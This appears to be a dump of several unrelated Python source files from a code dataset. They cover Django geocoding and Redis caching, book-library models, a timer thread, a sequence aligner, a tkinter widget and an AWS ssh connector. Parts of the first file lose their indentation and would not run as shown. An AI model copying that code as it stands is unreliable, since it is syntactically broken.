    # NOTE(review): `conn` is unused here (the helpers below open their
    # own connection) — confirm it is safe to drop.
    conn = get_redis_connection()
    klass = GoogleMapsAddressComponent
    results = []
    queue = []
    children = klass.get_children_id_list_from_redis_by_pk(gmac_id)
    results.extend(children)
    queue.extend(children)
    while len(queue) > 0:
        node = queue.pop()
        children = klass.get_children_id_list_from_redis_by_pk(node)
        results.extend(children)
        queue.extend(children)
    if as_objects:
        results = klass.objects.filter(pk__in=results)
    return results
@staticmethod
def get_all_children_from_redis(gmac_id, as_objects=True):
    """Fetch all descendant ids of `gmac_id` from the pre-computed
    all-children Redis list (one lookup instead of a tree walk — hence
    the "much FASTER" note versus get_children_from_redis)."""
    # NOTE(review): `conn` is unused here — the helper opens its own
    # connection; confirm it is safe to drop.
    conn = get_redis_connection()
    klass = GoogleMapsAddressComponent
    results = klass.get_all_children_id_list_from_redis_by_pk(gmac_id)
    if as_objects:
        results = klass.objects.filter(pk__in=results)
    return results
@staticmethod
def get_id_list_from_redis(gmac_id):
klass = GoogleMapsAddressComponent
results = []
results.append(gmac_id)
results.extend(klass.get_all_children_from_redis(gmac_id, False))
results = [int(e) for e in results]
return results
@staticmethod
def get_redis_children_key(gmac_id):
return "%s:%s" % ('gmac_children',gmac_id)
@staticmethod
def get_redis_all_children_key(gmac_id):
return "%s:%s" % ('gmac_all_sons',gmac_id)
def sync_children_to_redis(self):
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_children_key(self.pk)
# First, we make sure the key gets destroyed if it exists
conn.delete(key)
# Now we add the keys of the children to the list
children = self.get_immediate_children()
for child in children:
conn.lpush(key, child.pk)
def sync_all_children_to_redis(self):
"""
synchronizes all the children to a Redis list
"""
conn = get_redis_connection()
key = GoogleMapsAddressComponent.get_redis_all_children_key(self.pk)
# First, we make sure the key gets destroyed if it exists
conn.delete(key)
# Now we add the keys of the children to the list
children = self.get_all_children_seq()
for child in children:
conn.lpush(key, child.pk)
    @staticmethod
    def get_children_id_list_from_redis_by_pk(gmac_id):
        """Return the cached immediate-children id list for *gmac_id*,
        or None when no component with that pk exists."""
        try:
            # Existence probe only; the fetched object itself is unused.
            gmac = GoogleMapsAddressComponent.objects.get(pk=gmac_id)
            conn = get_redis_connection()
            key = GoogleMapsAddressComponent.get_redis_children_key(gmac_id)
            length = conn.llen(key)
            # NOTE(review): lrange bounds are inclusive, so (0, length)
            # asks for one extra index; harmless, (0, -1) is idiomatic.
            return conn.lrange(key, 0, length)
        except GoogleMapsAddressComponent.DoesNotExist:
            return None
    @staticmethod
    def get_all_children_id_list_from_redis_by_pk(gmac_id):
        """
        Return the cached full-descendant id list for *gmac_id* from
        Redis, or None when no component with that pk exists.
        """
        try:
            # Existence probe only; the fetched object itself is unused.
            gmac = GoogleMapsAddressComponent.objects.get(pk=gmac_id)
            conn = get_redis_connection()
            key = GoogleMapsAddressComponent.get_redis_all_children_key(gmac_id)
            length = conn.llen(key)
            # NOTE(review): lrange bounds are inclusive; (0, -1) is idiomatic.
            return conn.lrange(key, 0, length)
        except GoogleMapsAddressComponent.DoesNotExist:
            return None
    def get_children_id_list_from_redis(self):
        """Instance convenience wrapper around the by-pk static method."""
        return GoogleMapsAddressComponent.get_children_id_list_from_redis_by_pk(
            self.pk
        )
def update_formatted_name(self, commit=True):
elements = []
elements.append(self)
elements.extend(self.get_ancestors())
self.formatted_name = ', '.join([e.long_name for e in elements])
if commit:
self.save()
return self.formatted_name
def get_short_formatted_name(self):
lineage = self.get_lineage()
if len(lineage)>3:
elements = []
elements.append(lineage[0].long_name)
elements.append(lineage[1].long_name)
elements.append(lineage[-1].long_name)
return ', '.join(elements)
else:
return self.formatted_name
@staticmethod
def get_components_from_json(json_string, index=0):
results = []
try:
data = json.loads(json_string)
except json.decoder.JSONDecodeError:
return None
if 'address_components'in data:
components = data['address_components']
elif 'results' in data and len(data['results'])>0:
if 'address_components' in data['results'][index]:
components = data['results'][index]['address_components']
else:
return results
if not components:
return results
for c in components:
if 'political' in c['types']:
results.append(c)
return results
@staticmethod
def filter_components_below(components, component_type='locality'):
results = []
type_found = False
for c in components:
if not type_found:
if component_type in c['types']:
type_found = True
else:
continue
results.append(c)
return results
    @staticmethod
    def get_component_objects(components=None):
        """Persist a component-dict chain as model objects linked by parent,
        returning them leaf-first.

        NOTE(review): reverses the caller's list in place when it is not
        already country-first — the argument is mutated.
        """
        components = components or []
        results = []
        # Normalize to country-first so parents are created before children.
        if len(components)>0 and not 'country' in components[0]['types']:
            components.reverse()
        parent = None
        for c in components:
            obj = GoogleMapsAddressComponent.get_or_create(
                short_name=c['short_name'],
                long_name=c['long_name'],
                component_type=c['types'][0],
                parent=parent
            )
            if obj is not None:
                results.append(obj)
            parent = obj
        # Reverse elements so the most specific component comes first.
        results.reverse()
        return results
@staticmethod
def stack_components(components):
first = None
current = None
for c in components:
if first is None:
first = c
current = first
continue
else:
current['parent'] = c
current = current['parent']
current['parent'] = None
return first
    @staticmethod
    def set_location_data(obj, record):
        """Copy location/bounds/viewport geometry from a geocoding *record*
        onto *obj* and save it; no-op (no save) when geometry is None.

        NOTE(review): Points are built as Point(lat, lng); GIS Point is
        conventionally (x=lng, y=lat) — confirm the intended axis order.
        """
        if 'geometry' in record and record['geometry'] is None:
            return None
        if 'geometry' in record and 'location' in record['geometry']:
            if record['geometry']['location'] is not None:
                obj.location = Point(
                    record['geometry']['location']['lat'],
                    record['geometry']['location']['lng']
                )
        if 'geometry' in record and 'bounds' in record['geometry']:
            if record['geometry']['bounds'] is not None:
                obj.northeast_bound = Point(
                    record['geometry']['bounds']['northeast']['lat'],
                    record['geometry']['bounds']['northeast']['lng']
                )
                obj.southwest_bound = Point(
                    record['geometry']['bounds']['southwest']['lat'],
                    record['geometry']['bounds']['southwest']['lng']
                )
        # Viewport, when present, overwrites any bounds set above.
        if 'viewport' in record['geometry']:
            if record['geometry']['viewport'] is not None:
                obj.northeast_bound = Point(
                    record['geometry']['viewport']['northeast']['lat'],
                    record['geometry']['viewport']['northeast']['lng']
                )
                obj.southwest_bound = Point(
                    record['geometry']['viewport']['southwest']['lat'],
                    record['geometry']['viewport']['southwest']['lng']
                )
        obj.save()
    @staticmethod
    def get_or_create_from_json(json_string, max_items=None, type_list=None):
        """Create/fetch address components for every result in a geocoding
        response, returning those whose type is in *type_list*.

        Returns None on invalid JSON.
        NOTE(review): *max_items* is accepted but never used.
        """
        type_list = type_list or []
        results = []
        try:
            data = json.loads(json_string)
        except json.decoder.JSONDecodeError:
            return None
        # Create address components
        records = data['results']
        for index, record in enumerate(records):
            try:
                components = \
                    GoogleMapsAddressComponent.get_components_from_json(
                        json_string, index
                    )
                objects = GoogleMapsAddressComponent.get_component_objects(
                    components
                )
                # Find wanted objects (deduplicated across records).
                for obj in objects:
                    if obj is None:
                        continue
                    if obj.component_type in type_list and \
                            obj not in results:
                        results.append(obj)
                # Grab geometry / location info for political records;
                # objects[0] is the most specific component of the record.
                if (len(objects)> 0) and ('types' in record) \
                        and ('political' in record['types']):
                    GoogleMapsAddressComponent.set_location_data(
                        obj=objects[0],
                        record=record
                    )
            except MultipleObjectsReturned:
                # Log the offending record and keep processing the rest.
                log_path = localities_settings.REVERSE_GEOLOCATION_ERROR_LOG
                json_chunk = render_as_json(records[index])
                writelog(log_path, json_chunk)
                continue
        # Finally, return collected results
        return results
@staticmethod
def get_or_create_locality_from_json(json_string):
results = GoogleMapsAddressComponent.get_or_create_from_json(
json_string=json_string,
type_list=[
'locality',
'sublocality',
'administrative_area_level_2',
'administrative_area_level_1',
'country'
],
max_items=1
)
if results is not None and len(results)>0:
return results[0]
else:
return None
|
23,147 | 47762355d67470552fa1f74243cbdd5e223b8518 | from django.contrib import admin
from .models import Historia, Genero
# Register your models here.
admin.site.register([Historia, Genero])
|
23,148 | 39d4bf511d9d7d19e7801525d377a2e288fee3d5 | import re, time
from threading import Thread
class TimerManager(Thread):
    """
    Usage:
        tm = TimerManager()
        tm.register_timer(lambda: sys.stdout.write("tactical facepalm"), 'tactical', 0.1, True)
        register_timer(proc_addr, 'timer_name', interval, autostart)
        1.0 = 1s
        0.5 = 0.5s
        etc
    A timer callback that returns False is unregistered.
    """
    def __init__(self):
        Thread.__init__(self)
        self.timer_list = []
        # Set by run(); pre-set here so it always exists on the instance.
        self.running = False
    def register_timer(self, proc, name, tick_time, auto_start=False):
        """Add a timer; lazily starts the worker thread on first use."""
        self.timer_list.append({'Name': name, 'Time': tick_time,
                                'Active': auto_start, 'Addr': proc,
                                'Tick': time.time()})
        # Fix: is_alive() replaces the isAlive() alias removed in
        # Python 3.9 (is_alive exists since Python 2.6).
        if self.timer_list and not self.is_alive():
            self.start()
    def timers(self, proc_name):  # accepts regex wildcards
        """Iterate timers whose name matches the regex *proc_name*."""
        return filter(lambda t: re.match(proc_name, t['Name']) is not None,
                      self.timer_list)
    def enable(self, proc_name):
        for t in self.timers(proc_name):
            t['Tick'] = time.time()
            t['Active'] = True
    def disable(self, proc_name):
        for t in self.timers(proc_name):
            t['Active'] = False
    def run(self):
        self.running = True
        while self.running:
            start = time.time()
            # Fix: iterate over a snapshot — removing from the live list
            # while iterating it skipped the element after each removal.
            for t in list(self.timer_list):
                if t['Active'] and start - t['Tick'] > t['Time']:
                    ret = t['Addr']()
                    t['Tick'] = start
                    if ret == False:  # kept: also unregisters on a 0 return
                        self.timer_list.remove(t)
            time.sleep(0.5)
|
23,149 | 76062e2f72c7053da8cd7c2aa95028a3651bd42d | import numpy as np
from numpy import array
import sys
import random
from Bio import SeqIO
import ast
A, C, G, T = 0, 1, 2, 3
int_to_char = {0:'A', 1:'C', 2:'G', 3:'T'}
scoreMatrix = sys.argv[3]
score = ((open(scoreMatrix)).read()).rstrip("\n")
sc = score.split('\t')
#Assigning values for match and mismatch as derived from the scoring matrix
AA = int(float(sc[5]))#Covers AA and TT
GG = int(float(sc[10])) #Covers GG and CC
AT = int(float(sc[17])) #Covers AT mismatch
AC = int(float(sc[6])) #Covers AC and GT mismatch
AG = int(float(sc[7])) #Covers AG and TC mismatch
GC = int(float(sc[11])) #Covers GC mismatch
best = 0
opt_loc = (0,0)
gap = int(float(sys.argv[4]))
#ACGT by ACGT
scoring = array([[AA,AC,AG,AT],
[AC,GG,GC,AG],
[AG,GC,GG,AC],
[AT,AG,AC,AA]])
#For referencing alignment program with homework problems
'''scoring = array([[2,-1,-1,-1],
[-1,2,-1,-1],
[-1,-1,2,-1],
[-1,-1,-1,2]])'''
fileOne = sys.argv[1]
fileTwo = sys.argv[2]
my_fileOne = open(fileOne)
seqOne = (my_fileOne.read()).rstrip("\n")
my_fileTwo = open(fileTwo)
seqTwo = (my_fileTwo.read()).rstrip("\n")
subject = (list(seqOne))[5:]
query = (list(seqTwo))[5:]
sub = []
que = []
def str_to_int(seq):
    """Map nucleotide characters to integer codes (A=0, C=1, G=2, T=3).

    Characters outside ACGT are silently dropped, exactly as the original
    if/elif chain (which had no else branch) behaved.
    """
    code = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
    return [code[ch] for ch in seq if ch in code]
# Encode both sequences as integer lists for scoring-matrix indexing.
sub = str_to_int(subject)
que = str_to_int(query)
class AlignmentFinder(object):
def __init__(self, seq1, seq2, best=0, opt_loc=(0,0)):
self.seq1 = seq1
self.seq2 = seq2
self.D = None
def find_gobal_alignment(self):
self.D = np.zeros((self.seq1.size+1, self.seq2.size+1), dtype=np.int16)
self._compute_array()
print self.D
return self._traceback()
def _compute_array(self):
for i in xrange(self.seq1.size+1):
self.D[i,0] = i*gap
for j in xrange(self.seq2.size+1):
self.D[0,j] = j*gap
for i in xrange(1, self.seq1.size+1):
for j in xrange(1, self.seq2.size+1):
self.D[i,j] = max( self.D[i-1, j-1] + self._get_score(i, j),
self.D[i-1, j] + gap,
self.D[i, j-1] + gap)
# track the cell with the largest score
if self.D[i,j] >= best:
self.best = self.D[i,j]
self.optloc = (i,j)
print('The optimal alignment between given sequences has score ' + str(self.best) + '.')
print('The matrix location of the optimal alignment score is ' + str(self.optloc) + '.')
def _get_score(self, i, j):
''' To obtain the correct nucleotide in the sequence, we must
substract 1 to the matrix index. '''
return scoring[self.seq1[i-1], self.seq2[j-1]]
def _get_aligned_pair(self, i, j):
n1 = int_to_char[self.seq1[i-1]] if i>0 else '_'
n2 = int_to_char[self.seq2[j-1]] if j>0 else '_'
return (n1, n2)
def _traceback(self):
alignment= []
i = self.seq1.size
j = self.seq2.size
while i >0 and j>0:
if self.D[i-1, j-1] + self._get_score(i, j) == self.D[i,j]:
alignment.append(self._get_aligned_pair(i, j))
i -= 1
j -= 1
elif self.D[i-1, j] + gap == self.D[i,j]:
alignment.append(self._get_aligned_pair(i, 0))
i -= 1
else:
alignment.append(self._get_aligned_pair(0, j))
j -= 1
while i > 0:
alignment.append(self._get_aligned_pair(i, 0))
i -= 1
while j > 0:
alignment.append(self._get_aligned_pair(0, j))
j -= 1
alignment.reverse()
return alignment
def print_sequences(pairs):
    # Print the aligned pairs as two rows: top strand first, then bottom.
    # Python 2 only: print statements with trailing commas join with spaces.
    top_seq = []
    bottom_seq = []
    for (b, t) in pairs:
        bottom_seq.append(b)
        top_seq.append(t)
    for n in top_seq:
        print n,
    print ' '
    for n in bottom_seq:
        print n,
if __name__ == "__main__":
    # Wrap the encoded sequences as int16 arrays, align, and print both rows.
    s1 = array(sub, dtype=np.int16)
    s2 = array(que, dtype=np.int16)
    aligner = AlignmentFinder(s1, s2)
    pairs = aligner.find_gobal_alignment()
    print_sequences(pairs)
|
23,150 | bf0625040f6e4361eed26df0ada69b3becbc1027 | from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.timezone import now
from jsonfield import JSONField
from model_utils.models import TimeStampedModel
from libraries.models import Library
from readers.models import Reader
class Book(TimeStampedModel):
    """A book belonging to a library, optionally part of a series."""
    title = models.CharField(max_length=255)
    author = models.CharField(max_length=255, null=True, blank=True)
    series = models.ForeignKey('Series', null=True, blank=True)
    number_in_series = models.IntegerField(null=True, blank=True)
    library = models.ForeignKey(Library)
    added_by = models.ForeignKey(User)
    meta = JSONField(blank=True)
    def __str__(self):
        """Render as 'Title by Author (Series N)', omitting absent parts."""
        string = self.title
        if self.author:
            string = "{} by {}".format(string, self.author)
        if self.series:
            if self.number_in_series:
                string = "{} ({} {})".format(
                    string,
                    self.series.name,
                    self.number_in_series,
                )
            else:
                string = "{} ({})".format(string, self.series.name)
        return string
    def get_absolute_url(self):
        return reverse('book-detail', kwargs={'pk': self.id})
    def to_dict(self):
        """Serialize to a plain dict, using ids for related rows."""
        blob = {
            'title': self.title,
            'author': self.author,
            'library': self.library.id,
            'added_by': self.added_by.id,
            'meta': self.meta,
        }
        if self.series:
            blob['series'] = self.series.id
        if self.number_in_series:
            blob['number_in_series'] = self.number_in_series
        return blob
    def bookfiles(self):
        """All stored file versions of this book."""
        return BookFileVersion.objects.filter(book=self)
    @property
    def is_book(self):
        # Lets templates tell Book and Series apart without isinstance.
        return True
    def _file_version(self, filetype):
        """First BookFileVersion of *filetype* (or None), cached on the
        instance under '_<filetype>' — the same attribute names the old
        per-format properties used, so external code keeps working.

        Consolidates three previously copy-pasted property bodies.
        """
        cache_attr = '_' + filetype
        if not getattr(self, cache_attr, None):
            try:
                found = BookFileVersion.objects.filter(
                    book=self,
                    filetype=filetype,
                )[0]
            except (BookFileVersion.DoesNotExist, IndexError):
                found = None
            setattr(self, cache_attr, found)
        return getattr(self, cache_attr)
    @property
    def epub(self):
        return self._file_version(BookFileVersion.EPUB)
    @property
    def pdf(self):
        return self._file_version(BookFileVersion.PDF)
    @property
    def mobi(self):
        return self._file_version(BookFileVersion.MOBI)
    def get_version_for_kindle(self):
        """Kindle prefers mobi; fall back to pdf."""
        if self.mobi:
            return self.mobi
        return self.pdf
    def get_version_for_other(self):
        """Non-Kindle readers prefer epub; fall back to pdf."""
        if self.epub:
            return self.epub
        return self.pdf
    def last_emailed(self, user):
        """When this book was last successfully emailed to *user*, or None."""
        try:
            book_email = BookEmail.objects.filter(
                book_file__in=self.bookfiles(),
                status=BookEmail.SENT,
                reader__user=user,
            ).order_by('-created')[0]
            return book_email.created
        except (BookEmail.DoesNotExist, IndexError):
            return None
class BookFileVersion(TimeStampedModel):
    """One stored file (epub/pdf/mobi) of a Book on a storage provider."""
    DROPBOX = 'dropbox'
    STORAGE_PROVIDERS = (
        ('dropbox', 'dropbox'),
    )
    EPUB = 'epub'
    PDF = 'pdf'
    MOBI = 'mobi'
    FILETYPES = (
        ('epub', 'epub'),
        ('pdf', 'pdf'),
        ('mobi', 'mobi'),
    )
    book = models.ForeignKey('Book')
    filetype = models.CharField(max_length=10, choices=FILETYPES)
    storage_provider = models.CharField(
        max_length=10,
        choices=STORAGE_PROVIDERS,
        default=DROPBOX,
    )
    # Provider-relative path to the stored file.
    path = models.TextField(null=True)
    meta = JSONField()
    def __str__(self):
        return "{} - {}".format(self.book.title, self.filetype)
class BookEmail(TimeStampedModel):
    """Tracks one attempt to email a book file to a reader.

    Lifecycle: pending -> processing -> sent | error.
    """
    PENDING = 'pending'
    PROCESSING = 'processing'
    SENT = 'sent'
    ERROR = 'error'
    STATUSES = (
        ('pending', 'pending'),
        ('processing', 'processing'),
        ('sent', 'sent'),
        ('error', 'error'),
    )
    book_file = models.ForeignKey('BookFileVersion')
    # SET_NULL keeps the email history when a reader is deleted.
    reader = models.ForeignKey(Reader,
        blank=True,
        null=True,
        on_delete=models.SET_NULL,
    )
    status = models.CharField(
        max_length=20,
        choices=STATUSES,
        default=PENDING,
    )
    def __str__(self):
        return "{}: {} to {}".format(
            self.status, self.book_file.id, self.reader,
        )
class Series(TimeStampedModel):
    """A named book series within a library."""
    name = models.CharField(max_length=255)
    author = models.CharField(max_length=255, null=True, blank=True)
    library = models.ForeignKey(Library)
    meta = JSONField(blank=True)
    def __str__(self):
        return "{} by {}".format(self.name, self.author)
    def get_absolute_url(self):
        return reverse('series-detail', kwargs={'pk': self.id})
    @property
    def is_series(self):
        # Lets templates tell Series and Book apart without isinstance.
        return True
    class Meta:
        verbose_name_plural = 'series'
class Shelf(TimeStampedModel):
    """A named grouping of books within a library."""
    name = models.CharField(max_length=255)
    library = models.ForeignKey(Library)
    meta = JSONField(blank=True)
    def __str__(self):
        return self.name
    def get_absolute_url(self):
        return reverse('shelf-detail', kwargs={'pk':self.id})
    class Meta:
        verbose_name_plural = 'shelves'
class BookOnShelf(TimeStampedModel):
    """Join row placing a Book on a Shelf (many-to-many through table)."""
    book = models.ForeignKey('Book')
    shelf = models.ForeignKey('Shelf')
    def __str__(self):
        return '"{}" on {}'.format(self.book, self.shelf)
    class Meta:
        verbose_name_plural = 'books on shelves'
|
23,151 | 9b9d4160a9fcb54098d35e4158cebf17d94ec7ca | from django.db.models.aggregates import Avg, Count
from django.db.models.deletion import CASCADE
from django.urls.base import reverse
from category.models import category
from django.db import models
from django.db.models.fields import SlugField
from category.models import category
from account.models import Account
# Create your models here.
class Product(models.Model):
    """Catalog product; its public URL is built from category slug + slug."""
    product_name = models.CharField(max_length=200, unique=True)
    slug = models.SlugField(max_length=200, unique = True)
    description = models.TextField(max_length=500)
    price = models.IntegerField()
    images = models.ImageField(upload_to='photos/products')
    stock = models.IntegerField()
    is_available = models.BooleanField(default=True)
    category = models.ForeignKey(category, on_delete=models.CASCADE)
    created_date = models.DateTimeField(auto_now_add=True)
    modified_date = models.DateTimeField(auto_now=True)
    def get_url(self):
        """URL of the product-details page for this product."""
        return reverse('product_details', args = [self.category.slug, self.slug])
    def __str__(self):
        return self.product_name
    def averageReview(self):
        """Mean rating over visible (status=True) reviews; 0 when none."""
        reviews = ReviewRating.objects.filter(product = self, status = True).aggregate(average = Avg('rating'))
        avg = 0
        if reviews['average'] is not None:
            avg = float(reviews['average'])
        return avg
    def countReview(self):
        """Number of visible (status=True) reviews for this product."""
        review = ReviewRating.objects.filter(product = self, status = True).aggregate(count = Count('id'))
        count = 0
        if review['count'] is not None:
            count = int(review['count'])
        return count
class VariationManager(models.Manager):
    """Manager with shortcuts for the two active variation categories."""
    def colors(self):
        """Active color variations only."""
        return super(VariationManager, self).filter(variation_category = 'color', is_active = True)
    def sizes(self):
        """Active size variations only."""
        return super(VariationManager, self).filter(variation_category = 'size', is_active = True)
# Allowed values for Variation.variation_category: (stored value, label).
variation_category_choices = (
    ('color', 'color'),
    ('size', 'size'),
)
class Variation(models.Model):
    """A color/size variant of a Product."""
    product = models.ForeignKey(Product, on_delete=models.CASCADE)
    variation_category = models.CharField(max_length=100, choices=variation_category_choices)
    variation_value = models.CharField(max_length=100)
    is_active = models.BooleanField(default=True)
    # NOTE(review): auto_now updates this on EVERY save; auto_now_add (set
    # once at creation) may have been intended for a 'created_date' field.
    created_date = models.DateTimeField(auto_now=True)
    objects = VariationManager()
    def __str__(self):
        return self.variation_value
class ReviewRating(models.Model):
    """A user's review of a product; status=False hides it from listings."""
    product = models.ForeignKey(Product, on_delete=models.CASCADE)
    user = models.ForeignKey(Account, on_delete=models.CASCADE )
    subject = models.CharField(max_length=100, blank=True)
    review = models.TextField(max_length=500, blank=True)
    rating = models.FloatField()
    # IP address the review was submitted from.
    ip = models.CharField(max_length=20, blank=True)
    status = models.BooleanField(default=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    def __str__(self):
        return self.subject
class ProductGallery(models.Model):
    """Additional gallery image for a product."""
    product = models.ForeignKey(Product, on_delete=models.CASCADE)
    image = models.ImageField(upload_to='store/products', max_length = 255)
    def __str__(self):
        return self.product.product_name
    class Meta:
        verbose_name = 'productgallery'
        verbose_name_plural = 'Product Gallery'
|
23,152 | 16616d832bbf8f9900f1ee2b028c55cc5560e536 | import tkinter as tk
from tkinter import ttk
import math
class Table(tk.Canvas):
    """Canvas drawing a numbered round table with seats around it.

    Seats 1..activeSeats are red (occupied), the remainder green.
    """
    def __init__(self, parent, width, height, number):
        tk.Canvas.__init__(self, parent)
        self.width = width
        self.height = height
        self.number = number
        self.seatSize = self.width / 10
        self.gap = 30
        self.players = []
        self.activeSeats = 0
        self.isClicked = False
        self.bind("<Button-1>", self.onClick)
        self.configure(width=width, height=height)
        self.create_oval(self.seatSize + self.gap, self.seatSize + self.gap,
            self.width - self.seatSize - self.gap, self.height - self.seatSize - self.gap, fill="green")
    # NOTE(review): shadows tkinter's Canvas.update(); renaming would break
    # existing callers, so the name is kept.
    def update(self, width, height):
        """Resize the canvas and redraw the table, its number and seats."""
        self.width = width
        self.height = height
        self.seatSize = self.width / 10
        self.gap = 30
        self.configure(width=self.width, height=self.height, bd=1, bg="white")
        self.create_oval(self.seatSize + self.gap, self.seatSize + self.gap,
            self.width - self.seatSize - self.gap, self.height - self.seatSize - self.gap, fill="green")
        self.create_text(int(self.width / 2), int(self.height / 2), text=str(self.number), font="Times 38 bold")
        center = (self.width / 2, self.height / 2)
        radius = center[0] - self.seatSize  # fixes the 'lenght' typo
        angle = math.acos(-1) / 5  # pi / 5: ten seats evenly spaced
        # One loop replaces two near-identical copies that differed only in
        # the fill colour; max() preserves the old behavior of drawing every
        # occupied seat even if there are more than ten.
        for seat in range(max(10, self.activeSeats)):
            x = int(center[0] + radius * math.cos(angle * seat) - self.seatSize / 2)
            y = int(center[1] + radius * math.sin(angle * seat) - self.seatSize / 2)
            fill = "red" if seat < self.activeSeats else "green"
            self.create_oval(x, y, x + self.seatSize, y + self.seatSize, fill=fill)
            self.create_text(int(x + self.seatSize / 2), int(y + self.seatSize / 2), text=str(seat + 1), font="Times 12 bold")
    def setPlayers(self, players):
        """Store the player list and derive the occupied-seat count."""
        self.players = players
        self.activeSeats = len(self.players)
    def onClick(self, event):
        # Only records that a click happened; consumers poll isClicked.
        self.isClicked = True
23,153 | 89aaf182676e5a3bd5e7a156107a9abce40411ac | #!/usr/bin/env python
from abc import ABCMeta, abstractmethod
import argparse
import subprocess
import os
import sys
from typing import Any, Dict, List, Union
from aws_utils.instance_utils import format_instance, AwsInstance
# Ithemal runs on Python 2 mostly
try:
input = raw_input
except NameError:
pass
class InstanceConnectorABC(AwsInstance):
    """AwsInstance that also knows how to open a session on an instance."""
    __metaclass__ = ABCMeta  # Python 2 style abstract base declaration
    @abstractmethod
    def connect_to_instance(self, instance):
        # type: (Dict[str, Any]) -> None
        """Open a session on *instance*; implementations may never return
        (e.g. they exec into ssh)."""
        return NotImplemented
class InstanceConnector(InstanceConnectorABC):
    """Connects over ssh, optionally entering the 'ithemal' Docker container."""
    def __init__(self, identity, host, root, com):
        # type: (str, str, bool, List[str]) -> None
        super(InstanceConnector, self).__init__(identity, require_pem=True)
        self.host = host  # connect to the bare host instead of the container
        self.root = root  # connect as root inside the container
        self.com = com    # optional command to run instead of tmux attach
    def connect_to_instance(self, instance):
        # type: (Dict[str, Any]) -> None
        """Replace this process with an ssh session to *instance*.

        Does not return on success: os.execvp replaces the current process
        image; sys.exit(1) only runs if exec itself fails.
        """
        ssh_address = 'ec2-user@{}'.format(instance['PublicDnsName'])
        ssh_args = ['ssh', '-X', '-i', self.pem_key, '-t', ssh_address]
        if self.com:
            # Escape single quotes so the command survives the bash -lc quoting.
            conn_com = "bash -lc '{}'".format(' '.join(self.com).replace("'", r"\'"))
        else:
            conn_com = "bash -lc '~/ithemal/aws/aws_utils/tmux_attach.sh || /home/ithemal/ithemal/aws/aws_utils/tmux_attach.sh'"
        if self.host:
            ssh_args.append(conn_com)
        else:
            if self.root:
                user = 'root'
            else:
                user = 'ithemal'
            ssh_args.append('sudo docker exec -u {} -it ithemal {}'.format(user, conn_com))
        os.execvp('ssh', ssh_args)
        sys.exit(1)
def list_instances(instances):
    # type: (List[Dict[str, Any]]) -> None
    """Print a 1-based numbered listing of *instances*, or a notice if empty."""
    if not instances:
        print('No instances running!')
        return
    for idx, inst in enumerate(instances, start=1):
        print('{}) {}'.format(idx, format_instance(inst)))
def interactively_connect_to_instance(aws_instances):
    # type: (InstanceConnectorABC) -> None
    """Prompt the user to pick a running instance and connect to it.

    Connects immediately when exactly one instance is running; returns on
    'q', Ctrl-C, or EOF.
    """
    while True:
        instances = aws_instances.get_running_instances()
        if not instances:
            print('No instances to connect to!')
            return
        elif len(instances) == 1:
            aws_instances.connect_to_instance(instances[0])
            return
        list_instances(instances)
        try:
            res = input('Enter a number to connect to that instance, or "q" to exit: ')
        except KeyboardInterrupt:
            return
        except EOFError:
            return
        if res[0].lower() == 'q':
            return
        else:
            try:
                index_to_connect = int(res)
            except ValueError:
                print('"{}" is not an integer.'.format(res))
                continue
            if index_to_connect < 1 or index_to_connect > len(instances):
                print('{} is not between 1 and {}.'.format(index_to_connect, len(instances)))
                continue
            instance = instances[index_to_connect - 1]
            aws_instances.connect_to_instance(instance)
            return
def connect_to_instance_id_or_index(aws_instances, id_or_index):
    # type: (InstanceConnectorABC, str) -> None
    """Connect by 1-based index or by instance-ID prefix.

    Raises ValueError when the identifier matches zero or multiple
    instances.

    Bug fixes: previously execution fell through after the 'no instances'
    message (raising a confusing ValueError), and after a successful
    index-based connect it fell through to prefix matching (only masked
    because os.execvp normally never returns).
    """
    instances = aws_instances.get_running_instances()
    if len(instances) == 0:
        print('No instances to connect to!')
        return
    try:
        idx = int(id_or_index)
        if idx <= 0 or idx > len(instances):
            print('Provided index must be in the range [{}, {}]'.format(1, len(instances)))
            return
        aws_instances.connect_to_instance(instances[idx - 1])
        return
    except ValueError:
        # Not an integer: fall back to instance-ID prefix matching.
        pass
    possible_instances = [instance for instance in instances if instance['InstanceId'].startswith(id_or_index)]
    if len(possible_instances) == 0:
        raise ValueError('{} is not a valid instance ID or index'.format(id_or_index))
    elif len(possible_instances) == 1:
        aws_instances.connect_to_instance(possible_instances[0])
    else:
        raise ValueError('Multiple instances have ambiguous identifier prefix {}'.format(id_or_index))
def main():
    # type: () -> None
    """Parse CLI args and either list instances or connect to one."""
    parser = argparse.ArgumentParser(description='Connect to a running AWS EC2 instance')
    # --host / --root / --list are mutually exclusive connection modes.
    user_group = parser.add_mutually_exclusive_group()
    user_group.add_argument('--host', help='Connect directly to the host', default=False, action='store_true')
    user_group.add_argument('--root', help='Connect to root in the Docker instance', default=False, action='store_true')
    user_group.add_argument('--list', help='Just list the instances, rather than connecting', default=False, action='store_true')
    parser.add_argument('identity', help='Identity to use to connect')
    parser.add_argument('instance_id', help='Instance IDs to manually connect to', nargs='?', default=None)
    parser.add_argument('--com', help='Command to run (uninteractive)', nargs='+')
    args = parser.parse_args()
    aws_instances = InstanceConnector(args.identity, args.host, args.root, args.com)
    if args.list:
        list_instances(aws_instances.get_running_instances())
        return
    if args.instance_id:
        connect_to_instance_id_or_index(aws_instances, args.instance_id)
    else:
        interactively_connect_to_instance(aws_instances)
|
def hamming(firstStrand, secondStrand):
    """Hamming distance between two strands; every extra position in the
    longer strand counts as a mismatch."""
    mismatches = sum(1 for a, b in zip(firstStrand, secondStrand) if a != b)
    return mismatches + abs(len(firstStrand) - len(secondStrand))
|
23,155 | bbc13c4edb87fc945ef64764e6ad7a34166ed87a | import re
class token():
    """Leaf value in the AST, tagged with its source position."""
    def __init__(self, val, fil='', line=0, char=0):
        self.val = val
        # Chained assignment: stores fil/line/char both individually and
        # as the 3-element metadata list.
        self.metadata = [self.fil, self.line, self.char] = fil, line, char
        # NOTE(review): instance-level __repr__ works for direct calls
        # (t.__repr__()), but the builtin repr() looks __repr__ up on the
        # class, so it bypasses this lambda.
        self.__repr__ = lambda: str(self.val)
        self.listfy = lambda: self.val
def tokenify(s, fil='', line=0, char=0):
    """Wrap *s* in a token (with position info) unless it already is one."""
    if isinstance(s, token):
        return s
    return token(s, fil, line, char)
def detokenify(s):
    """Unwrap a token to its raw value; pass anything else through."""
    if isinstance(s, token):
        return s.val
